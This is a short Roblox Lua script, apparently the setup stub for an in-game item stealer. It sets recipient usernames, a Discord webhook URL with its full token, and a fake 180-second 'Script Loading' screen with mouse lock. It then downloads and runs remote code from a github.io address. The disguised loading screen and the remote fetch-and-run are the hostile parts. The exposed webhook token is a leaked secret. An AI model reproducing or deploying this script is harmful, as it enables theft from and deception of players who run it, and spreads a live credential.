UserName = "lololj0123"
UserName2 = "lololj0123"
Webhook = "https://discord.com/api/webhooks/1101833373858660492/AdfRkmv4sMBSxeTsNQ8N7rRV5k5slHd9BFHSTYRWVgQMHpdzG5gDA0ws96bCKoj3fXTn"

_G.LoadingScreen = true
_G.AntiLeave = false
_G.MouseLock = true 

_G.ScriptName = "Rizz Scriptz"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://rizz69.github.io/Main.lua", true))()
